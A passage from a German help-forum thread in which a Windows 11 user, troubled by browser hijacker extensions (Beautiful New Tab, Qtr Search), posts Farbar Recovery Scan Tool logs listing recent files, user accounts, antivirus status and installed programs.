2024-07-20 15:31 - 2023-08-07 14:20 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001
2024-07-20 15:31 - 2022-06-22 10:19 - 000003194 _____ C:\Windows\system32\Tasks\OneDrive Per-Machine Standalone Update Task
2024-07-20 15:31 - 2022-06-22 10:19 - 000002155 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2024-07-20 14:52 - 2024-05-27 21:44 - 000000000 ____D C:\Users\skysc\AppData\Local\Google
2024-07-20 14:48 - 2024-05-22 20:55 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2024-07-20 14:48 - 2024-05-22 20:55 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2024-07-20 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Windows\ELAMBKUP
2024-07-19 20:47 - 2024-04-14 15:22 - 000004024 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2}
2024-07-19 20:47 - 2024-04-14 15:22 - 000003900 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31}
2024-07-18 14:31 - 2023-11-11 18:24 - 000002002 _____ C:\Users\skysc\Desktop\Discord.lnk
2024-07-17 19:28 - 2024-04-14 15:22 - 000002363 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2024-07-17 19:28 - 2024-04-14 15:22 - 000002322 _____ C:\Users\Public\Desktop\Brave.lnk
2024-07-17 19:25 - 2024-05-27 21:48 - 000000000 ____D C:\Users\skysc\AppData\Local\GUI
2024-07-17 19:24 - 2024-05-25 20:06 - 000002246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2024-07-17 19:24 - 2024-05-25 20:06 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2024-07-17 16:49 - 2022-06-22 10:36 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2024-07-16 17:08 - 2024-02-17 14:40 - 000267880 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy_4.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 002799208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000751208 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000222816 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000206440 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000145000 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000108136 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe
2024-07-16 17:08 - 2023-08-07 17:35 - 000075368 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe
2024-07-16 15:17 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\Drivers\wd
2024-07-15 17:42 - 2024-06-04 17:29 - 000239576 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2024-07-12 15:57 - 2022-06-22 10:16 - 000474232 _____ C:\Windows\system32\FNTCACHE.DAT
2024-07-12 15:56 - 2023-12-14 23:09 - 000000000 ____D C:\Windows\InboxApps
2024-07-12 15:56 - 2023-10-11 20:19 - 000000000 ____D C:\Windows\system32\Microsoft-Edge-WebView
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\UUS
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemResources
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\WinMetadata
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\Sgrm
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\SecureBootUpdates
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\oobe
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellExperiences
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellComponents
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\Provisioning
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\PolicyDefinitions
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\bcastdvr
2024-07-12 14:43 - 2022-06-22 10:16 - 000003754 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2024-07-12 14:43 - 2022-06-22 10:16 - 000003630 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2024-07-11 14:49 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ServiceState
2024-07-09 20:55 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\USOPrivate
2024-07-09 20:51 - 2023-08-07 17:05 - 000000000 ____D C:\Windows\system32\MRT
2024-07-09 20:50 - 2023-08-07 17:05 - 194135240 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2024-07-09 20:44 - 2022-05-07 07:17 - 000000000 ____D C:\Windows\CbsTemp
2024-07-09 20:42 - 2022-06-22 10:19 - 003212800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2024-07-09 20:14 - 2023-09-19 15:20 - 000000000 ____D C:\Program Files (x86)\Overwolf
2024-07-01 18:05 - 2024-05-29 17:26 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Norton
2024-06-30 20:23 - 2023-08-20 18:23 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Word
2024-06-27 14:17 - 2024-05-28 21:28 - 000000000 ____D C:\ProgramData\Avast Software
2024-06-26 21:39 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Code
2024-06-24 14:31 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2024-06-24 14:24 - 2024-05-23 16:54 - 000049704 _____ C:\Users\skysc\Downloads\Lebenslauf Jessika.pdf
2024-06-24 14:08 - 2024-06-18 19:47 - 000038589 _____ C:\Users\skysc\Downloads\Bewerbung Jessika.pdf
2024-06-23 14:38 - 2023-08-07 14:19 - 000000000 ____D C:\Users\skysc\AppData\Local\PlaceholderTileLogoFolder
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2023-08-14 18:17 - 2023-08-14 18:17 - 000005998 _____ () C:\Users\skysc\AppData\Local\91094746112
2024-04-06 15:56 - 2024-04-06 15:56 - 000005998 _____ () C:\Users\skysc\AppData\Local\93293858673
2023-10-13 15:29 - 2023-10-13 15:29 - 000005998 _____ () C:\Users\skysc\AppData\Local\9437468409
2023-10-22 18:46 - 2023-10-22 18:46 - 000000028 _____ () C:\Users\skysc\AppData\Local\CapCutConfigure.ini
2023-10-22 20:57 - 2023-10-22 20:57 - 000001611 _____ () C:\Users\skysc\AppData\Local\recently-used.xbel
2024-05-25 19:34 - 2024-05-25 19:34 - 000000017 _____ () C:\Users\skysc\AppData\Local\resmon.resmoncfg
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
|
|
23.07.2024, 13:39
| #2 |
| | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Addition log:
__________________Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 21.07.2024
durchgeführt von skysc (22-07-2024 21:18:43)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) (2023-08-07 12:09:18)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
Administrator (S-1-5-21-1221853621-2447620182-1933698513-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1221853621-2447620182-1933698513-503 - Limited - Disabled)
Gast (S-1-5-21-1221853621-2447620182-1933698513-501 - Limited - Disabled)
skysc (S-1-5-21-1221853621-2447620182-1933698513-1001 - Administrator - Enabled) => C:\Users\skysc
WDAGUtilityAccount (S-1-5-21-1221853621-2447620182-1933698513-504 - Limited - Disabled)
zweisky (S-1-5-21-1221853621-2447620182-1933698513-1002 - Limited - Enabled) => C:\Users\zweisky
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton 360 for Gamers (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}
FW: Norton 360 for Gamers (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.) Hidden
AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.81 - Advanced Micro Devices, Inc.) Hidden
AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.10.0.2198 - Advanced Micro Devices, Inc.)
AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\{b7b5b85e-6364-4ab4-ab0f-3a89b0de0fe2}) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.) Hidden
Autodesk Fusion 360 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.16976 - Autodesk, Inc.)
blender (HKLM\...\{1589EDDA-7F97-49A7-A931-5646B819BC9E}) (Version: 4.1.0 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 126.1.67.134 - Die Brave-Autoren)
CapCut (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\CapCut) (Version: 2.6.0.814 - Bytedance Pte. Ltd.)
Combo Cleaner (HKLM\...\{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) Hidden
Combo Cleaner (HKLM-x32\...\InstallShield_{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT)
CrystalDiskInfo 9.2.3 (HKLM\...\CrystalDiskInfo_is1) (Version: 9.2.3 - Crystal Dew World)
CurseForge (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Overwolf_cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj) (Version: 1.255.0.2 - Overwolf app)
Discord (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Discord) (Version: 1.0.9023 - Discord Inc.)
Easy Connection to Screen (HKLM\...\{B779166F-820A-44EE-9DAC-7F794BC8A67F}) (Version: 4.7.1 - Samsung)
ENE Video Capture Box HAL (HKLM\...\{A096611D-BA11-4A1A-8D09-0A0462D7C8F2}) (Version: 1.0.5.15 - Ene Tech.) Hidden
ENE Video Capture Box HAL (HKLM-x32\...\{974259bf-3ed1-4cd6-9ed1-40c7f601a786}) (Version: 1.0.5.15 - Ene Tech.) Hidden
ENE_DRAM_RGB_AIO (HKLM\...\{40514BA6-1FC2-4BBD-84A2-504634A97196}) (Version: 1.0.4.16 - Ene Tech.) Hidden
ENE_DRAM_RGB_AIO (HKLM-x32\...\{ca38f41e-a37c-41b2-82e3-28b215743448}) (Version: 1.0.4.16 - Ene Tech.) Hidden
ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden
ENE_EHD_M2_HAL (HKLM-x32\...\{7cf61546-b8ec-4a85-a301-fa8c79296bd0}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden
ENE_External_Device_HAL (HKLM\...\{2B8E611F-0B51-4FAC-87BB-AF50D82E7DDA}) (Version: 1.0.11.1 - ENE Tech) Hidden
ENE_External_Device_HAL (HKLM-x32\...\{bb9d349f-b87b-4026-b336-1604708bd09c}) (Version: 1.0.11.1 - ENE Tech) Hidden
ENE_MousePad_HAL (HKLM\...\{9E97178A-ADB8-4778-BE60-7E28E2A72721}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden
ENE_MousePad_HAL (HKLM-x32\...\{c2c794a4-7986-4c45-884d-d4ca43b88df9}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden
ENE_X_AIC_HAL (HKLM\...\{CF703694-01C6-4062-B797-84DB215662BC}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden
ENE_X_AIC_HAL (HKLM-x32\...\{c662a481-d76a-4188-95d2-6eb4ffd55542}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden
Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.)
Futuremark SystemInfo (HKLM-x32\...\{DB3FC272-D04E-42E1-A981-20A781A9561C}) (Version: 5.69.1204.0 - Futuremark)
GIMP 2.10.34-2 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\GIMP-2_is1) (Version: 2.10.34 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 126.0.6478.182 - Google LLC)
iPod-Unterstützung (HKLM\...\{5530CCC4-99F6-4198-BB1B-F1F78D6BCA76}) (Version: 12.11.3.7 - Apple Inc.)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LIFT 3.0 (HKLM\...\{535DCAB0-B2C4-45F1-B03D-7E7A1059B74E}) (Version: 3.2.0 - C.C.Buchner)
Malwarebytes version 5.1.6.117 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 5.1.6.117 - Malwarebytes)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft 365 - it-it (HKLM\...\O365HomePremRetail - it-it) (Version: 16.0.15225.20204 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 126.0.2592.113 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 126.0.2592.113 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{1F2B6AF3-C260-8666-5950-E3FEDBC851D6}) (Version: 10.1.22621.3036 - Microsoft Corporation)
Microsoft OneDrive (HKLM\...\OneDriveSetup.exe) (Version: 24.132.0701.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (HKLM-x32\...\{8bdfe669-9705-4184-9368-db9ce581e0e7}) (Version: 14.36.32532.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (HKLM-x32\...\{410c0ee1-00bb-41b6-9772-e12c2828b02f}) (Version: 14.36.32532.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (HKLM\...\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (HKLM\...\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (HKLM-x32\...\{C2C59CAB-8766-4ABD-A8EF-1151A36C41E5}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (HKLM-x32\...\{73F77E4E-5A17-46E5-A5FC-8A061047725F}) (Version: 14.36.32532 - Microsoft Corporation) Hidden
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.90.2 - Microsoft Corporation)
Mine-imator 1.2.9 (HKLM-x32\...\{EF61A1AA-5F85-4E94-ACC6-D5650A312AE6}}_is1) (Version: 1.2.9.2 - David Norgren)
MSI Afterburner 4.6.5 (HKLM-x32\...\Afterburner) (Version: 4.6.5 - MSI Co., LTD)
MSI Center SDK (HKLM-x32\...\{15289038-41BE-48F8-B8B9-0B1021D3089E}}_is1) (Version: 3.2023.1127.01 - MSI)
MSIRegister (HKLM-x32\...\{80B995A4-3A86-4690-98A6-563F1A788835}_is1) (Version: 2.0.0.22 - MSI)
Norton 360 (HKLM-x32\...\NGC) (Version: 22.24.2.6 - NortonLifeLock Inc)
NVIDIA FrameView SDK 1.3.8513.32290073 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8513.32290073 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.27.0.120 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.27.0.120 - NVIDIA Corporation)
NVIDIA Grafiktreiber 551.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 551.52 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.40.14 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.40.14 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 29.1.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.15225.20150 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.15225.20194 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0410-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden
Opera GX Stable 109.0.5097.142 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Opera GX 109.0.5097.142) (Version: 109.0.5097.142 - Opera Software)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.254.0.13 - Overwolf Ltd.)
Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.1.0.1 - Patriot Memory) Hidden
Patriot Viper M2 SSD RGB (HKLM-x32\...\{07236f40-ec25-4646-8cb6-b6aaf1597324}) (Version: 1.1.0.1 - Patriot Memory) Hidden
PowerToys (Preview) (HKLM\...\{92AE79ED-B1CD-425A-8111-64E61153C5E1}) (Version: 0.81.1 - Microsoft Corporation) Hidden
PowerToys (Preview) x64 (HKLM-x32\...\{fca38025-53e3-439e-8a24-a3261efd2924}) (Version: 0.81.1 - Microsoft Corporation)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9071.1 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.42.526.2020 - Realtek)
Revo Uninstaller 2.4.5 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.4.5 - VS Revo Group, Ltd.)
RGB Fusion (HKLM-x32\...\{FFA8F1FA-3C2C-4A94-AC0B-0DF47272C25F}) (Version: 3.22.1221.1 - Gigabyte)
Shotcut (HKLM\...\Shotcut_is1) (Version: 23.09.29 - Meltytech)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 10.0.1266 - SUPERAntiSpyware.com)
UltiMaker Cura 5.4.0 (HKLM-x32\...\UltiMaker Cura 5.4.0-5.4.0) (Version: 5.4.0 - UltiMaker)
UltiMaker Cura 5.5.0 (HKLM-x32\...\UltiMaker Cura 5.5.0-5.5.0) (Version: 5.5.0 - UltiMaker)
Uninstall Lunar Client (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 3.2.11 - Moonsworth LLC)
Verbatim_SureFireGaming_Product (HKLM\...\{35CB65C6-A7E3-4EE7-AD40-738D70A72164}) (Version: 1.0.3.11 - Verbatim) Hidden
Verbatim_SureFireGaming_Product (HKLM-x32\...\{d601832a-0d94-46ce-9b19-78e8a5887313}) (Version: 1.0.3.11 - Verbatim) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.20 - VideoLAN)
WD P40 Game Drive (HKLM\...\{EE55DBAE-ECDD-4ADD-AAB5-23DE848B0996}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden
WD P40 Game Drive (HKLM-x32\...\{72b1a866-fc31-4381-bff3-fa6cd8823777}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden
WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK AN1500 (HKLM-x32\...\{9c94735f-73fd-4b0f-9ddb-8be7b3cc4681}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK D50 (HKLM\...\{BDE43F26-5917-44F8-B86A-F1D9A6B80B32}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden
WD_BLACK D50 (HKLM-x32\...\{a1d1ba00-92b7-4a99-8ebd-65b25c0e9e44}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden
Windows-Treiberpaket - Apple, Inc. (USBAAPL) USB (05/19/2017 6.0.9999.69) (HKLM\...\7771A0176A543725D7BBF70A546C096A4EE2DD40) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.)
Windows-Treiberpaket - Apple, Inc. (USBAAPL64) USB (05/19/2017 6.0.9999.69) (HKLM\...\C2C6A29F3ABC80FD992777A92DF30699124D37C5) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.)
WinRAR 6.23 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.23.0 - win.rar GmbH)
Packages:
=========
Atomic Heart -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.579645D26CFD_1.14.4.0_x64__4hny5m903y3g0 [2024-06-15] (Focus Home Interactive SA)
Atomic Heart: Annihilation Instinct -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.1495F5E33141_1.0.0.0_x64__4hny5m903y3g0 [2023-10-13] (Focus Home Interactive SA)
Atomic Heart: Trapped in Limbo -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.48903E5CC1186_1.0.0.0_x64__4hny5m903y3g0 [2024-04-06] (Focus Home Interactive SA)
Copilot -> C:\Program Files\WindowsApps\Microsoft.Copilot_1.0.4.0_neutral__8wekyb3d8bbwe [2024-07-14] (Microsoft Corporation)
Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_2024.3.211.0_neutral__6rarf9sa4v8jt [2024-07-14] (Disney)
EarTrumpet -> C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne [2024-07-14] (File-New-Project) [Startup Task]
Hello Neighbor 2 -> C:\Program Files\WindowsApps\tinyBuildGames.HelloNeighbor2_1.3.6.0_x64__3sz1pp2ynv2xe [2024-06-15] (tinyBuild Games)
High on Life -> C:\Program Files\WindowsApps\2637SquanchGamesInc.HighonLife_1.13.3652.0_x64__mh7dg3tfmz2cj [2024-06-15] (Squanch Games Inc.)
